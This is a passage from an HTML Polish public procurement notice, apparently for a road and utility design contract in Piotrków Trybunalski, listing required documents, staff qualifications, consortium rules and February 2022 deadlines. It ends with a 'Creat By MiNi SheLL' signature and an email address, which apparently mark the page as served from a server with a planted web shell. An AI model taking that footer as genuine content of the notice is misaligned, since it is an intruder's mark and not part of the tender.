wzór stanowi załącznik nr 5 do IDW, <br/>2)	oświadczenie o aktualności informacji w oświadczeniu, o którym mowa w art. 125 ust. 1 ustawy Pzp – którego wzór stanowi załącznik nr 6 do IDW.</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">7.	Podmiotowe środki dowodowe wymagane od wykonawcy, w zakresie spełniania warunków udziału w postępowaniu, obejmują:<br/>1)	Wykaz usług polegające na należytym wykonaniu 1 zamówienia (a w przypadku świadczeń okresowych lub ciągłych wykonywaniu), w okresie ostatnich 3 lat przed terminem składania ofert, a jeżeli okres prowadzenia działalności jest krótszy w tym okresie – usługi polegającej na wykonaniu programu funkcjonalno-użytkowego zgodnie z Rozporządzeniem w sprawie szczegółowego zakresu i formy dokumentacji projektowej, specyfikacji technicznych wykonania <br/>i odbioru robót budowlanych oraz programu funkcjonalno-użytkowego, obejmującego przebudowę lub budowę lub rozbudowę drogi lub ulicy <br/>wraz z budową, przebudową infrastruktury technicznej, tj. oświetlenia ulicznego lub kanalizacji deszczowej, lub kanalizacji sanitarnej, lub wodociągu o wartości min. 10.000,00 zł brutto;<br/>wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy zostały wykonane, oraz załączeniem dowodów określających czy te dostawy zostały wykonane lub są wykonywane należycie, przy czym dowodami, o których mowa, są referencje bądź inne dokumenty sporządzone przez podmiot, na rzecz którego dostawy lub usługi były wykonywane, a w przypadku świadczeń powtarzających się lub ciągłych są wykonywane, a jeżeli z uzasadnionej przyczyny o obiektywnym charakterze wykonawca nie jest w stanie uzyskać tych dokumentów – oświadczenie wykonawcy; w przypadku świadczeń powtarzających się lub ciągłych nadal wykonywanych referencje bądź inne dokumenty potwierdzające ich należyte wykonywanie powinny być wydane w okresie ostatnich 3 miesięcy <br/>– wg załącznika nr 7 do IDW,<br/>W przypadku, gdy wykonawca wykonał w ramach jednego kontraktu/ umowy większy zakres prac, dla potrzeb niniejszego postępowania winien wyodrębnić zakres/rodzaj robót, o którym mowa powyżej i podać jego wartość.<br/>Jeżeli wykonawca wykazuje doświadczenie nabyte w ramach kontraktu (zamówienia/umowy) realizowanego przez wykonawców wspólnie ubiegających się o udzielenie zamówienia (konsorcjum), zamawiający nie dopuszcza <br/>by wykonawca polegał na doświadczeniu grupy wykonawców, której był członkiem, jeżeli faktycznie i konkretnie nie wykonywał wykazywanego zakresu prac. Zamawiający zastrzega możliwość zwrócenia się do wykonawcy o wyjaśnienia <br/>w zakresie faktycznie i konkretnie wykonywanego zakresu prac oraz przedstawienia stosownych dowodów np. umowy konsorcjum, z której wynika zakres obowiązków czy wystawionych przez wykonawcę faktur.<br/>2)	Wykaz osób skierowanych do realizacji zamówienia niezbędnych do wykonania zamówienia, w szczególności: <br/>	co najmniej jedną osobę pełniąca samodzielną funkcję techniczną <br/>w budownictwie w specjalności drogowej,<br/>	co najmniej jedną osobę pełniąca samodzielną funkcję techniczną <br/>w budownictwie w specjalności instalacyjnej w zakresie sieci, instalacji <br/>i urządzeń elektrycznych i elektroenergetycznych,<br/>	co najmniej jedną osobę pełniąca samodzielną funkcję techniczną <br/>w budownictwie w specjalności instalacyjnej w zakresie sieci, urządzeń <br/>i instalacji wodno-kanalizacyjnych,<br/>	co najmniej jedną osobę będącą specjalistą ds. ochrony środowiska.<br/>– wg załącznika nr 8 do IDW.</span> </h3> <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> 8.	Ofertę stanowi:<br/>1)	formularz Oferta, sporządzony wg wzoru stanowiącego załącznik nr 1 do IDW, bądź też w innej zgodnej formie, odpowiadającej treści IDW,<br/>2)	część niejawna oferty (jeśli dotyczy), zawierająca informacje stanowiące tajemnicę przedsiębiorstwa – zgodnie z art. 8 ust. 3 ustawy Pzp, z tym że należy ją załączyć w osobnym pliku z oznaczeniem „Tajemnica przedsiębiorstwa”. Wykonawca nie może zastrzec informacji, o których mowa w art. 222 ust. 5 ustawy Pzp.<br/>9.	Do oferty wykonawca zobowiązany jest złożyć za pośrednictwem Platformy:<br/>1)	odpis lub informację z Krajowego Rejestru Sądowego, Centralnej Ewidencji <br/>i Informacji o Działalności Gospodarczej lub innego właściwego rejestru, chyba że zamawiający może je uzyskać za pomocą bezpłatnych i ogólnodostępnych baz danych a wykonawca w formularzu Oferta wskazał dane umożliwiające dostęp <br/>do tych dokumentów w odniesieniu do wykonawcy jak również w odniesieniu <br/>do podmiotów udostępniających zasoby,<br/>2)	pełnomocnictwo do reprezentowania wszystkich wykonawców wspólnie ubiegających się o udzielenie zamówienia lub inny dokument potwierdzający umocowanie do reprezentowania wykonawcy (np. umowa o współdziałaniu). Pełnomocnik może być ustanowiony do reprezentowania wykonawców <br/>w postępowaniu albo do reprezentowania w postępowaniu i zawarcia umowy Wykonawcy działający wspólnie:<br/>	jeżeli ofertę składa kilku wykonawców działających wspólnie, obowiązani <br/>są ustanowić wspólnego pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia publicznego albo reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego – do pełnomocnictwa stosuje się w szczególności przepisy Kodeksu cywilnego,<br/>	pełnomocnikiem może być jeden z wykonawców działających wspólnie lub osoba trzecia (np. pracownik jednego z wykonawców),<br/>	jeżeli pełnomocnikiem pozostałych wykonawców jest wykonawca będący osobą prawną to może on działać zgodnie z ujawnionymi w dokumentach rejestrowych zasadami reprezentacji.<br/>3)	pełnomocnictwo do złożenia Oferty względnie do podpisania podmiotowych środków dowodowych lub innych oświadczeń i dokumentów składanych <br/>wraz z Ofertą, chyba że prawo do ich podpisania wynika z dokumentów, o których mowa w pkt 1, <br/>4)	oryginał gwarancji lub poręczenia, jeśli wadium wnoszone jest w innej formie niż pieniądz, z uwzględnieniem postanowień Rozdziału XVI IDW (jeśli dotyczy),<br/>5)	oświadczenie, o którym mowa w art. 125 ustawy Pzp, zgodnie ze wzorem, który stanowi załącznik nr 2 do IDW, na zasadach określonych w Rozdziale XII IDW i Rozdziale XIV pkt 12 – oświadczenie nie jest podmiotowym środkiem dowodowym i stanowi tymczasowy dowód potwierdzający brak podstaw wykluczenia i spełnianie warunków udziału w postępowaniu na dzień składania ofert,<br/>6)	zobowiązanie podmiotu udostępniającego zasoby na potrzeby wykonawcy składającego ofertę (jeśli dotyczy) – zgodnie ze wzorem, który stanowi załącznik nr 3 do IDW, w przypadku gdy wykonawca polega na zdolnościach podmiotów udostępniających zasoby w celu potwierdzenia spełniania warunków udziału <br/>w postępowaniu wraz z pełnomocnictwami, jeżeli prawo do podpisania danego zobowiązania nie wynika z dokumentów, o których mowa w pkt 7.1), <br/>7)	oświadczenie wykonawców wspólnie ubiegających się o udzielenie zamówienia (jeśli dotyczy), dotyczące dostaw, usług lub robót budowlanych, które wykonają poszczególni wykonawcy, o którym mowa w art. 117 ust. 4 ustawy Pzp, zgodnie ze wzorem, który stanowi załącznik nr 4 do IDW,<br/>8)	oświadczenia i/lub dokumenty, stanowiące wyjaśnienia, na podstawie których zamawiający dokona oceny skuteczności zastrzeżenia informacji zawartych w ofercie, stanowiących tajemnicę przedsiębiorstwa (jeżeli wykonawca zastrzega takie informacje). <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 1.	Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia. W takim przypadku wykonawcy ustanawiają pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia albo reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego.<br/>2.	W przypadku wykonawców wspólnie ubiegających się o udzielenie zamówienia, żaden z nich nie może podlegać wykluczeniu na podstawie art. 108 ust. 1 ustawy Pzp, natomiast spełnianie warunków udziału w postępowaniu wykonawcy wykazują zgodnie z postanowieniami Rozdziału VI IDW.<br/>3.	W przypadku wspólnego ubiegania się o zamówienie przez wykonawców, oświadczenie, o którym mowa w art. 125 ustawy Pzp składa każdy z wykonawców wspólnie ubiegających się o zamówienie. Oświadczenia te potwierdzają brak podstaw wykluczenia oraz spełnianie warunków udziału w postępowaniu w zakresie, w jakim każdy z wykonawców wykazuje spełnianie warunków udziału w postępowaniu, zgodnie ze wzorem, który stanowi załącznik nr 2 do IDW.<br/>4.	W przypadku wspólnego ubiegania się o zamówienie przez wykonawców wykonawcy wspólnie ubiegający się o udzielenie zamówienia dołączają do oferty, w celu wykazania spełniania warunków udziału, oświadczenie o podziale zadań pomiędzy współwykonawców, o którym mowa w art. 117 ust. 4 ustawy Pzp, zgodnie ze wzorem, który stanowi załącznik nr 4 do IDW. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> 1.	Umowy na realizację, zostaną zawarte na warunkach wymienionych w projektowanych postanowieniach umowy – CZĘŚĆ III SWZ zamówienia. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2022-02-01 09:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://platformazakupowa.pl/pn/piotrkow_tryb</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2022-02-01 09:05</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2022-03-02</span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com